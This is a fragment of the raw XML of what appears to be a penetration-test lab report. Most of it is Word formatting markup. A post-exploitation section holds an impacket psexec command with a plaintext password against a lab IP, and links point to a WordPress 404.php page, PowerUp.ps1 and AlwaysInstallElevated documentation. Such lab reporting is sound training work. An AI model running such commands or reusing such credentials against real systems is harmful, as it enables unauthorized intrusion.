                  </w:r>
                </w:p>
                <w:p w14:paraId="61FA5949" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                    <w:spacing w:after="200"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">└─$ </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>proxychains</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> python3 /usr/share/doc/python3-impacket/examples/psexec.py admin:</w:t>
                  </w:r>
                  <w:hyperlink r:id="rId49">
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="22"/>
                      </w:rPr>
                      <w:t>UWyBGeTp3Bhw7f@10.5.5.30</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
                <w:p w14:paraId="5C40389C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="27" w:name="_qsh70q" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="27"/>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="09FCB287" wp14:editId="3E59AB07">
                        <wp:simplePos x="0" y="0"/>
                        <wp:positionH relativeFrom="column">
                          <wp:posOffset>52387</wp:posOffset>
                        </wp:positionH>
                        <wp:positionV relativeFrom="paragraph">
                          <wp:posOffset>635</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="5838825" cy="2515870"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="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5838825" cy="2515870"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:anchor>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="26C89283" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:pStyle w:val="Heading3"/>
                    <w:numPr>
                      <w:ilvl w:val="2"/>
                      <w:numId w:val="1"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="0"/>
                    </w:tabs>
                    <w:spacing w:before="0" w:after="240" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:bookmarkStart w:id="28" w:name="_3as4poj" w:colFirst="0" w:colLast="0"/>
                  <w:bookmarkEnd w:id="28"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t xml:space="preserve">5.3.2 </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>Post-Exploitation</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="77A97D42" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>System Proof Screenshot:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3C374CBB" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:line="360" w:lineRule="auto"/>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0" distB="0" distL="0" distR="0" wp14:anchorId="1102F80C" wp14:editId="39F2A94B">
                        <wp:extent cx="5232400" cy="2959100"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="3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51"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5232400" cy="2959100"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="56E98084" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56F4362C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="090446AB" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB"/>
    <w:sectPr w:rsidR="00CB67CB">
      <w:headerReference w:type="default" r:id="rId52"/>
      <w:footerReference w:type="default" r:id="rId5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CEE7F" w14:textId="77777777" w:rsidR="00B75916" w:rsidRDefault="00B75916">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="12A0C781" w14:textId="77777777" w:rsidR="00B75916" w:rsidRDefault="00B75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Helvetica Neue">
    <w:panose1 w:val="02000503000000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E50002FF" w:usb1="500079DB" w:usb2="00000010" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Roboto">
    <w:panose1 w:val="02000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0000AFF" w:usb1="5000217F" w:usb2="00000021" w:usb3="00000000" w:csb0="0000019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A6A14" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9340"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00177B5C">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="808080"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>Page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43F99" w14:textId="77777777" w:rsidR="00B75916" w:rsidRDefault="00B75916">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="48F33D6C" w14:textId="77777777" w:rsidR="00B75916" w:rsidRDefault="00B759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8A2F1" w14:textId="75C339CF" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9340"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="276" w:lineRule="aut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B386AE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6E83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5441164D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95B4B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0FE224E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6E0870A"/>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num w:numId="1" w16cid:durableId="1862281505">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1025323088">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="4740327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67CB"/>
    <w:rsid w:val="00177B5C"/>
    <w:rsid w:val="002034D4"/>
    <w:rsid w:val="003D6A84"/>
    <w:rsid w:val="00B046F2"/>
    <w:rsid w:val="00B75916"/>
    <w:rsid w:val="00BE42D7"/>
    <w:rsid w:val="00CB67CB"/>
    <w:rsid w:val="00E20BC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4:docId w14:val="26961658"/>
  <w15:docId w15:val="{D230B9F2-311F-9844-9D74-9567D5B8F9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widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="240" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:i/>
      <w:color w:val="365F91"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:before="220" w:after="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="40"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>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300" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:color w:val="17365D"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:before="480" w:after="240" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:i/>
      <w:color w:val="0F253F"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="80" w:type="dxa"/>
        <w:left w:w="70" w:type="dxa"/>
        <w:bottom w:w="80" w:type="dxa"/>
        <w:right w:w="80" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a0">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="80" w:type="dxa"/>
        <w:left w:w="70" w:type="dxa"/>
        <w:bottom w:w="80" w:type="dxa"/>
        <w:right w:w="80" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a1">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="-5" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a2">
    <w:basedOn w:val="TableNormal"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="-5" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00177B5C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00177B5C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00177B5C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00177B5C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E20BC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hyperlink" Target="http://192.168.232.55/shenzi/wp-content/themes/twentytwenty/404.php" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated" TargetMode="External"/><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yperlink" Target="https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated" TargetMode="Externa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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.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hyperlink" Target="mailto:kali@192.168.119.164" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.pn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hyperlink" Target="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:UWyBGeTp3Bhw7f@10.5.5.3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25</Pages>
  <Words>2720</Words>
  <Characters>15510</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>129</Lines>
  <Paragraphs>36</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>18194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m4lc0de - Anwar Siregar</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-27T01:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-27T02:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>